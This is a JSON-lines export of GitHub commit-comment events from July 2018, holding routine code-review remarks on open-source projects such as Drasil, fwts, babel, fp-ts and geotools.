{"id":"7943967080","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657054,"position":null,"line":null,"path":null,"commit_id":"82684d9a7d04b78de3ccb94e3bb85200382da568","created_at":"2018-07-10T13:55:00Z","updated_at":"2018-07-10T13:55:00Z","author_association":"OWNER","body":"No, because it is logically part of the document language."}},"created_at":"2018-07-10T13:55:00Z"}
{"id":"7943970764","type":"CommitCommentEvent","actor":{"login":"shadyysf"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657062,"position":15,"line":16,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T13:55:34Z","updated_at":"2018-07-10T13:55:34Z","author_association":"NONE","body":"nit: can probably be encapsulated into a helper method and used in multiple samples."}},"created_at":"2018-07-10T13:55:34Z"}
{"id":"7943971535","type":"CommitCommentEvent","actor":{"login":"borntohonk"},"repo":{"name":"WerWolv98/EdiZon_ConfigsAndScripts"},"payload":{"comment":{"id":29657063,"position":null,"line":null,"path":null,"commit_id":"c2eaa19fa05247b9a3a994b67ed7bcc89c1217cd","created_at":"2018-07-10T13:55:40Z","updated_at":"2018-07-10T13:55:40Z","author_association":"CONTRIBUTOR","body":"missed UNIDENTIFIED Material 34 to UNIDENTIFIED Material 41"}},"created_at":"2018-07-10T13:55:40Z"}
{"id":"7943972554","type":"CommitCommentEvent","actor":{"login":"Rgsolo"},"repo":{"name":"wustmz/ProductManageBackend"},"payload":{"comment":{"id":29657064,"position":4,"line":7,"path":"README.md","commit_id":"0484d67d38895cb76294b33809a1d48cdce18cfe","created_at":"2018-07-10T13:55:49Z","updated_at":"2018-07-10T13:55:49Z","author_association":"NONE","body":"username"}},"created_at":"2018-07-10T13:55:49Z"}
{"id":"7943972686","type":"CommitCommentEvent","actor":{"login":"Duncaen"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29657066,"position":6,"line":6,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T13:55:50Z","updated_at":"2018-07-10T13:55:50Z","author_association":"MEMBER","body":"I think `build_wrksrc` should be used for `src` otherwise it might not clean up the build dir correctly."}},"created_at":"2018-07-10T13:55:50Z"}
{"id":"7943979787","type":"CommitCommentEvent","actor":{"login":"CornyjK"},"repo":{"name":"adafruit/travis-ci-arduino"},"payload":{"comment":{"id":29657086,"position":null,"line":null,"path":null,"commit_id":"518f03876a31e6b98215a6cf60f7905ce5596818","created_at":"2018-07-10T13:56:52Z","updated_at":"2018-07-10T13:56:52Z","author_association":"CONTRIBUTOR","body":"@deanm1278 you are right, I forgot to add folder when cache is not used (cache creates folders automatically before anything runs). It should be run only if folder does not exist (as it creates junk warning otherwise)."}},"created_at":"2018-07-10T13:56:52Z"}
{"id":"7943986436","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29657098,"position":342,"line":342,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:57:50Z","updated_at":"2018-07-10T13:57:50Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-10T13:57:50Z"}
{"id":"7943987678","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657101,"position":null,"line":null,"path":null,"commit_id":"6f3c1675c0fe4b8cda3b970c1af11d5a85c7da9e","created_at":"2018-07-10T13:58:00Z","updated_at":"2018-07-10T13:58:00Z","author_association":"COLLABORATOR","body":"There are a lot of labels for one small paragraph at the moment: one for the introductory sentence, one for a list of bullet points, and one for a sentence after the bullet points (and then 1 each for the 2 following figures). Wanted to confirm that this looks right (in terms of design)? @szymczdm "}},"created_at":"2018-07-10T13:58:00Z"}
{"id":"7943991581","type":"CommitCommentEvent","actor":{"login":"shadyysf"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657112,"position":23,"line":24,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T13:58:35Z","updated_at":"2018-07-10T13:58:35Z","author_association":"NONE","body":"It's not necessary to add console tracing here unless we really are listing something that won't be obvious when running the samples and capturing the inputs and outputs. However, if we do trace on the console for some samples, it would probably be nice to also do so for all."}},"created_at":"2018-07-10T13:58:35Z"}
{"id":"7943993543","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29657117,"position":337,"line":337,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:58:52Z","updated_at":"2018-07-10T13:58:52Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-10T13:58:52Z"}
{"id":"7944000145","type":"CommitCommentEvent","actor":{"login":"sergejx"},"repo":{"name":"mfecenko/yajco-examples"},"payload":{"comment":{"id":29657129,"position":null,"line":null,"path":null,"commit_id":"d0a18d202e79b4ddb65a0df8217e54903f421b56","created_at":"2018-07-10T13:59:49Z","updated_at":"2018-07-10T13:59:49Z","author_association":"NONE","body":"Pri závislosti na junit pridajte `<scope>test</scope>`"}},"created_at":"2018-07-10T13:59:49Z"}
{"id":"7944004304","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29657149,"position":299,"line":299,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T14:00:25Z","updated_at":"2018-07-10T14:00:25Z","author_association":"COLLABORATOR","body":"done\r\n"}},"created_at":"2018-07-10T14:00:25Z"}
{"id":"7944004337","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29657150,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T14:00:26Z","updated_at":"2018-07-10T14:00:26Z","author_association":"NONE","body":"currently using this patch https://build.opensuse.org/package/view_file/home:darix:playground/libmill/soversion.patch?expand=1\r\n\r\nalthough I am not sure why we hardcoding lib instead of using LIB_INSTALL_DIR or CMAKE_INSTALL_LIBDIR"}},"created_at":"2018-07-10T14:00:26Z"}
{"id":"7944004565","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29657151,"position":38,"line":14,"path":"src/tokentreeformatter/config/WhitespaceConfig.hx","commit_id":"a178209528bf826425cca3e574c84622219302db","created_at":"2018-07-10T14:00:27Z","updated_at":"2018-07-10T14:00:27Z","author_association":"MEMBER","body":"Hm, isn't NONE good enough / do you really need the full dot path?"}},"created_at":"2018-07-10T14:00:27Z"}
{"id":"7944005673","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29657156,"position":270,"line":270,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T14:00:36Z","updated_at":"2018-07-10T14:00:36Z","author_association":"COLLABORATOR","body":"yes. done"}},"created_at":"2018-07-10T14:00:36Z"}
{"id":"7944006601","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657158,"position":null,"line":null,"path":null,"commit_id":"82684d9a7d04b78de3ccb94e3bb85200382da568","created_at":"2018-07-10T14:00:43Z","updated_at":"2018-07-10T14:00:43Z","author_association":"COLLABORATOR","body":"Making the change now"}},"created_at":"2018-07-10T14:00:43Z"}
{"id":"7944009182","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29657166,"position":139,"line":139,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T14:01:07Z","updated_at":"2018-07-10T14:01:07Z","author_association":"COLLABORATOR","body":"done\r\n"}},"created_at":"2018-07-10T14:01:07Z"}
{"id":"7944010874","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/di"},"payload":{"comment":{"id":29657170,"position":5,"line":245,"path":"src/AbstractContainer.php","commit_id":"0cd5fc2a0edb12f6acd79c8506fa056120f35e6d","created_at":"2018-07-10T14:01:22Z","updated_at":"2018-07-10T14:01:22Z","author_association":"MEMBER","body":"fixed."}},"created_at":"2018-07-10T14:01:22Z"}
{"id":"7944018784","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657186,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:02:35Z","updated_at":"2018-07-10T14:02:35Z","author_association":"NONE","body":"Does this actually fix STK issue?"}},"created_at":"2018-07-10T14:02:35Z"}
{"id":"7944022192","type":"CommitCommentEvent","actor":{"login":"shadyysf"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657193,"position":96,"line":91,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T14:03:07Z","updated_at":"2018-07-10T14:03:07Z","author_association":"NONE","body":"Should locking and unlocking a branch be done in separate samples?"}},"created_at":"2018-07-10T14:03:07Z"}
{"id":"7944024023","type":"CommitCommentEvent","actor":{"login":"oduvan"},"repo":{"name":"ksandkov/django"},"payload":{"comment":{"id":29657200,"position":17,"line":17,"path":"polls/models.py","commit_id":"1a470c22cbe120afb046f6d4450abb6ccc3a15b8","created_at":"2018-07-10T14:03:23Z","updated_at":"2018-07-10T14:03:23Z","author_association":"NONE","body":"методы всегда должны идти после аттрибутов"}},"created_at":"2018-07-10T14:03:23Z"}
{"id":"7944026587","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29657202,"position":22,"line":31,"path":"site/database/migrations/2014_10_12_000000_create_users_table.php","commit_id":"fd80982ea3767e1178ede9f533cc935e683117c9","created_at":"2018-07-10T14:03:46Z","updated_at":"2018-07-10T14:03:46Z","author_association":"OWNER","body":"é melhor deixar, vou direito o que é"}},"created_at":"2018-07-10T14:03:46Z"}
{"id":"7944033299","type":"CommitCommentEvent","actor":{"login":"ALBERTSINZZ1"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":29657213,"position":6,"line":310,"path":"pkg/kubelet/pod_workers.go","commit_id":"0f4c739b2c82cff98c92bac66943f7fddf3dda37","created_at":"2018-07-10T14:04:49Z","updated_at":"2018-07-10T14:04:49Z","author_association":"NONE","body":"Change out try during a mirrored approach"}},"created_at":"2018-07-10T14:04:49Z"}
{"id":"7944033708","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29657215,"position":8,"line":19,"path":"site/database/migrations/2018_07_09_193446_create_perfis_externos_table.php","commit_id":"fd80982ea3767e1178ede9f533cc935e683117c9","created_at":"2018-07-10T14:04:52Z","updated_at":"2018-07-10T14:04:52Z","author_association":"OWNER","body":"sim"}},"created_at":"2018-07-10T14:04:52Z"}
{"id":"7944043311","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29657236,"position":null,"line":null,"path":null,"commit_id":"fd80982ea3767e1178ede9f533cc935e683117c9","created_at":"2018-07-10T14:06:22Z","updated_at":"2018-07-10T14:06:22Z","author_association":"OWNER","body":"os integer que são chaves estrangeiras tem que ter o unsigned. vou consertar só isso rapidinho"}},"created_at":"2018-07-10T14:06:22Z"}
{"id":"7944043952","type":"CommitCommentEvent","actor":{"login":"eswenson1"},"repo":{"name":"PDP-10/its"},"payload":{"comment":{"id":29657237,"position":null,"line":null,"path":null,"commit_id":"58a9467a714cbfe9c220a98d1cd59982645394eb","created_at":"2018-07-10T14:06:28Z","updated_at":"2018-07-10T14:06:28Z","author_association":"MEMBER","body":"Yes, but I thought it useful to do that as a separate ticket once we (I and @TheFausap) made sure everything was working. It makes it easy to do diffs (SRCCOMs)."}},"created_at":"2018-07-10T14:06:28Z"}
{"id":"7944047797","type":"CommitCommentEvent","actor":{"login":"lubojr"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":29657245,"position":null,"line":null,"path":null,"commit_id":"4e81e35d340a4a9fb6b2701751588409b8a59f12","created_at":"2018-07-10T14:07:04Z","updated_at":"2018-07-10T14:07:04Z","author_association":"NONE","body":"Awesome work including Jiffle into Rendering transformations as a process!! It will be now much much easier to do map algebra on the fly for a casual user (like me). \r\nDoes this commit mean that Jiffle can be used as a WPS process out of the box or just as a rendering transformation in SLD style as the updated tutorial shows? Because I do not see it in a list of available WPS processes on the latest development build of geoserver. I am however able to use this process as a rendering transformation in SLD style (validation goes through and style works as supposed to), which was my goal anyway. "}},"created_at":"2018-07-10T14:07:04Z"}
{"id":"7944064235","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657281,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:09:36Z","updated_at":"2018-07-10T14:09:36Z","author_association":"OWNER","body":"This commit may do nothing. It just remove unknown elements from samsung struct."}},"created_at":"2018-07-10T14:09:36Z"}
{"id":"7944066675","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657287,"position":null,"line":null,"path":null,"commit_id":"6f3c1675c0fe4b8cda3b970c1af11d5a85c7da9e","created_at":"2018-07-10T14:09:59Z","updated_at":"2018-07-10T14:09:59Z","author_association":"OWNER","body":"If we're going to refer to all of them, then this is right. If we're creating a lot of labels for things which are never referred to, then this seems wrong.  In other words, paragraphs should not *require* a `Label`."}},"created_at":"2018-07-10T14:09:59Z"}
{"id":"7944068997","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29657292,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-10T14:10:19Z","updated_at":"2018-07-10T14:10:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T14:10:19Z"}
{"id":"7944075340","type":"CommitCommentEvent","actor":{"login":"Andarist"},"repo":{"name":"thiagoarrais/babel"},"payload":{"comment":{"id":29657306,"position":5,"line":92,"path":"packages/babel-preset-env/data/plugin-features.js","commit_id":"df2c09f48079a1fd20fb638a03d6eb6d683f5d8b","created_at":"2018-07-10T14:11:18Z","updated_at":"2018-07-10T14:11:18Z","author_association":"NONE","body":"i would reorder this to keep proposals at the bottom of this object"}},"created_at":"2018-07-10T14:11:18Z"}
{"id":"7944081863","type":"CommitCommentEvent","actor":{"login":"sledorze"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29657323,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:12:17Z","updated_at":"2018-07-10T14:12:17Z","author_association":"COLLABORATOR","body":"@gcanti After having played with the dev version of typescript, I've noticed the inference has changed a bit.\r\nAnd I'm actually thinking that the non refinement version should also benefit from using also a B type parameter.\r\n\r\nLike so:\r\n\r\n```typescript\r\nexport function findFirst<A, B extends A>(as: Array<A>, predicate: Predicate<B>): Option<A>\r\n```\r\n\r\nThe reason is that in some part of our codebase, typescript was taking the Predicate type param into account in the inference of the result.\r\n"}},"created_at":"2018-07-10T14:12:17Z"}
{"id":"7944083466","type":"CommitCommentEvent","actor":{"login":"qgaillot"},"repo":{"name":"mberard/AEPONYX"},"payload":{"comment":{"id":29657327,"position":null,"line":null,"path":null,"commit_id":"83edaebadeb1ff6f7ee580b036b1685206aba264","created_at":"2018-07-10T14:12:31Z","updated_at":"2018-07-10T14:12:31Z","author_association":"COLLABORATOR","body":"non fonctionnel; certains angle dans le mauvais sens"}},"created_at":"2018-07-10T14:12:31Z"}
{"id":"7944085712","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657332,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:12:52Z","updated_at":"2018-07-10T14:12:52Z","author_association":"NONE","body":"I'm thinking the same, because passing whole response to libril already make the it recognize all stuffs you wrote above, and nothing is missing, rather than re-converting and `memcpy`'ing \"missing\" stuffs\r\n\r\nIf RIL still work after this commit then I think it should fix my hardcoded `responseLen`"}},"created_at":"2018-07-10T14:12:52Z"}
{"id":"7944085844","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29657333,"position":10,"line":71,"path":"odoo/tools/date_utils.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T14:12:53Z","updated_at":"2018-07-10T14:12:53Z","author_association":"MEMBER","body":"included in the iterated values"}},"created_at":"2018-07-10T14:12:53Z"}
{"id":"7944088536","type":"CommitCommentEvent","actor":{"login":"s-clay"},"repo":{"name":"s-clay/NEA-Sudoku"},"payload":{"comment":{"id":29657341,"position":18,"line":98,"path":"python-scripts/gui.py","commit_id":"ee90d0c6f1a3e2b052397d0f3fc9d1eba1897c8c","created_at":"2018-07-10T14:13:17Z","updated_at":"2018-07-10T14:13:17Z","author_association":"OWNER","body":"This broke it\r\n"}},"created_at":"2018-07-10T14:13:17Z"}
{"id":"7944090471","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29657345,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-10T14:13:35Z","updated_at":"2018-07-10T14:13:35Z","author_association":"OWNER","body":"Could we not as well merge the `n-t-roff` bug fixes into `typo-tests`? There had been a lot code changes to `n-t-roff` which had not been bug fixes so these need not be merged into `typo-tests`?"}},"created_at":"2018-07-10T14:13:35Z"}
{"id":"7944092276","type":"CommitCommentEvent","actor":{"login":"Andarist"},"repo":{"name":"thiagoarrais/babel"},"payload":{"comment":{"id":29657351,"position":5,"line":14,"path":"packages/babel-preset-env/data/shipped-proposals.js","commit_id":"df2c09f48079a1fd20fb638a03d6eb6d683f5d8b","created_at":"2018-07-10T14:13:50Z","updated_at":"2018-07-10T14:13:50Z","author_association":"NONE","body":"u should probably remove this out from shipped proposals, not sure if it shoudl readded elsewhere though"}},"created_at":"2018-07-10T14:13:50Z"}
{"id":"7944093201","type":"CommitCommentEvent","actor":{"login":"typemytype"},"repo":{"name":"typesupply/defcon"},"payload":{"comment":{"id":29657352,"position":null,"line":null,"path":null,"commit_id":"bce898c1c2e6b24c4774fe9ca6f7a9f5b80ed6a0","created_at":"2018-07-10T14:13:58Z","updated_at":"2018-07-10T14:13:58Z","author_association":"COLLABORATOR","body":"it should not break in any way... so raise exception or None is not so nice\r\n\r\nIgnoring open paths is an other option"}},"created_at":"2018-07-10T14:13:58Z"}
{"id":"7944093336","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29657354,"position":null,"line":null,"path":null,"commit_id":"8afdd71b3a3498caf14edb9866c8cff332889c6a","created_at":"2018-07-10T14:14:00Z","updated_at":"2018-07-10T14:14:00Z","author_association":"MEMBER","body":"nice catch :) brain-fart on my end... did not change the name https://github.com/espressif/arduino-esp32/commit/c1a94b532617e4f7dd13a2d90b50dfb54eeff3fb\r\nNice catch :)"}},"created_at":"2018-07-10T14:14:00Z"}
{"id":"7944094900","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657358,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:14:13Z","updated_at":"2018-07-10T14:14:13Z","author_association":"OWNER","body":"Yeah, my commit is the complicated version of your hardcoded responseLen :D"}},"created_at":"2018-07-10T14:14:13Z"}
{"id":"7944098939","type":"CommitCommentEvent","actor":{"login":"kLabz"},"repo":{"name":"jdonaldson/vaxe"},"payload":{"comment":{"id":29657369,"position":38,"line":61,"path":"plugin/haxe.vim","commit_id":"bc944f063be72e9e666ae89c43255b1368afd9c3","created_at":"2018-07-10T14:14:49Z","updated_at":"2018-07-10T14:14:49Z","author_association":"NONE","body":"This needs a \"nullcheck\" with ncm2 (not sure why only with ncm2), `additional_text_edits` does not always exist."}},"created_at":"2018-07-10T14:14:49Z"}
{"id":"7944099989","type":"CommitCommentEvent","actor":{"login":"ubuntuyumiao"},"repo":{"name":"illini-robomaster/iRM_Embedded_2018"},"payload":{"comment":{"id":29657371,"position":null,"line":null,"path":null,"commit_id":"064c2aebcd32d67435141e48d0763ade817dacda","created_at":"2018-07-10T14:14:58Z","updated_at":"2018-07-10T14:14:58Z","author_association":"NONE","body":"can you build your project by CLion"}},"created_at":"2018-07-10T14:14:58Z"}
{"id":"7944106447","type":"CommitCommentEvent","actor":{"login":"zhxt"},"repo":{"name":"zhangtianzi/apollo"},"payload":{"comment":{"id":29657387,"position":null,"line":null,"path":null,"commit_id":"9d102906b4dabd3026dea397060a0c20c114dcd9","created_at":"2018-07-10T14:15:52Z","updated_at":"2018-07-10T14:15:52Z","author_association":"NONE","body":"FYI.\r\nGitHub-Contributing-to-a-Project : https://git-scm.com/book/zh/v2/GitHub-%E5%AF%B9%E9%A1%B9%E7%9B%AE%E5%81%9A%E5%87%BA%E8%B4%A1%E7%8C%AE"}},"created_at":"2018-07-10T14:15:52Z"}
{"id":"7944107041","type":"CommitCommentEvent","actor":{"login":"artem-fedorov"},"repo":{"name":"jenkinsci/performance-plugin"},"payload":{"comment":{"id":29657389,"position":null,"line":null,"path":null,"commit_id":"9b38268c10c1642c753e7a9a2b3216e4336db496","created_at":"2018-07-10T14:15:57Z","updated_at":"2018-07-10T14:15:57Z","author_association":"COLLABORATOR","body":"@VonLatvala\r\nI have 1 open issue with build comparision: https://issues.jenkins-ci.org/browse/JENKINS-41818?focusedCommentId=343258&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#comment-343258\r\nPossible after fix it we will make release.\r\n\r\nCould  you clone this repo and build hpi snapshot using command: `mvn package`?\r\n"}},"created_at":"2018-07-10T14:15:57Z"}
{"id":"7944112067","type":"CommitCommentEvent","actor":{"login":"mayareyesricon"},"repo":{"name":"mayareyesricon/Aprendendo-Git"},"payload":{"comment":{"id":29657404,"position":null,"line":null,"path":null,"commit_id":"0940ce567add6f1741fcc71822601ced2a9064a5","created_at":"2018-07-10T14:16:42Z","updated_at":"2018-07-10T14:16:42Z","author_association":"OWNER","body":"https://guides.github.com/activities/hello-world/"}},"created_at":"2018-07-10T14:16:42Z"}
{"id":"7944118033","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":29657411,"position":null,"line":null,"path":null,"commit_id":"4e81e35d340a4a9fb6b2701751588409b8a59f12","created_at":"2018-07-10T14:17:37Z","updated_at":"2018-07-10T14:17:37Z","author_association":"MEMBER","body":"I did not test it as a stand-alone WPS process, but it should work in theory. I've just added a small change that should help, the process now shows in the capabilities, but not in the request builder. I have no time to look into it and figure out why unfortunately..."}},"created_at":"2018-07-10T14:17:37Z"}
{"id":"7944118116","type":"CommitCommentEvent","actor":{"login":"JulienVincenot"},"repo":{"name":"tanders/cluster-engine"},"payload":{"comment":{"id":29657412,"position":null,"line":null,"path":null,"commit_id":"b1b3834ac7af5b31c09473d83a9088050759915c","created_at":"2018-07-10T14:17:37Z","updated_at":"2018-07-10T14:17:37Z","author_association":"COLLABORATOR","body":"same problem with those lines you added last year, if I remember correctly to make sure the sources were useable in both Clozure and SBCL. Now I get always an error \r\n  READ error during LOAD:\r\n    illegal terminating character after a colon: #\\%\r\n      Line: 34, Column: 13, File-Position: 1147 [i.e. the : after sb-kernel]\r\nStream: #<SB-INT:FORM-TRACKING-STREAM\r\n for \"file /Users/julienvincenot/Documents/Dev-GitHub/cluster-engine/sources/_000.main-interface.lisp\"\r\n                {10069B49C3}>\r\n\r\nso for now I removed the following block and was able to evaluate again\r\n\r\n#|\r\n#+CCL\r\n(defun function-lambda-list (fn)\r\n  (ccl:arglist fn))\r\n\r\n#+SBCL\r\n(defun function-lambda-list (fn)\r\n  (sb-kernel:%simple-fun-arglist fn))\r\n\r\n|#"}},"created_at":"2018-07-10T14:17:37Z"}
{"id":"7944125134","type":"CommitCommentEvent","actor":{"login":"alepauly"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657431,"position":96,"line":91,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T14:18:40Z","updated_at":"2018-07-10T14:18:40Z","author_association":"OWNER","body":"Could be but I don't think I should add it here. My focus was to get methods in here to genera request/response samples for what we already have in docs so we really only needed lock, and I'm unlocking to leave the state as found."}},"created_at":"2018-07-10T14:18:40Z"}
{"id":"7944128080","type":"CommitCommentEvent","actor":{"login":"sledorze"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29657440,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:19:06Z","updated_at":"2018-07-10T14:19:06Z","author_association":"COLLABORATOR","body":"Example with typescript `3.0.0-dev.20180710`:\r\n```typescript\r\ninterface A {\r\n  a: string\r\n}\r\n\r\ninterface B {\r\n  a: string\r\n  b: number\r\n}\r\n\r\nconst findIT = ( arr: B[]) => {\r\n  const r =  array.findFirst(arr, x => x.a === 'toto') // Option<B>\r\n  const r2 =  array.findFirst(arr, (x : A) => x.a === 'toto') // Option<A>\r\n  const r3 =  array.findFirst(arr, (x : B) => x.a === 'toto') // Option<B>\r\n}\r\n```"}},"created_at":"2018-07-10T14:19:06Z"}
{"id":"7944132316","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29657444,"position":42,"line":35,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T14:19:43Z","updated_at":"2018-07-10T14:19:43Z","author_association":"OWNER","body":"Don't need to use lodash, the query should do the sorting by date"}},"created_at":"2018-07-10T14:19:43Z"}
{"id":"7944134905","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29657447,"position":68,"line":61,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T14:20:06Z","updated_at":"2018-07-10T14:20:06Z","author_association":"OWNER","body":"We should try to use the standard margin the we are setting on RVBox"}},"created_at":"2018-07-10T14:20:06Z"}
{"id":"7944136187","type":"CommitCommentEvent","actor":{"login":"Boccialex"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29657449,"position":null,"line":null,"path":null,"commit_id":"b230d20619c2e6bf769a765fa238486fd3b9a003","created_at":"2018-07-10T14:20:17Z","updated_at":"2018-07-10T14:20:17Z","author_association":"NONE","body":"Is is possible that the last change is to be made not in _`onCreateOptionsMenu`_ but in `onOptionsItemSelected`?"}},"created_at":"2018-07-10T14:20:17Z"}
{"id":"7944136612","type":"CommitCommentEvent","actor":{"login":"alvinsunyixiao"},"repo":{"name":"illini-robomaster/iRM_Embedded_2018"},"payload":{"comment":{"id":29657451,"position":null,"line":null,"path":null,"commit_id":"064c2aebcd32d67435141e48d0763ade817dacda","created_at":"2018-07-10T14:20:20Z","updated_at":"2018-07-10T14:20:20Z","author_association":"MEMBER","body":"Yes you can, since CLion is very CMake friendly, the only thing you need to setup is adding the arm toolchain binaries to you system PATH"}},"created_at":"2018-07-10T14:20:20Z"}
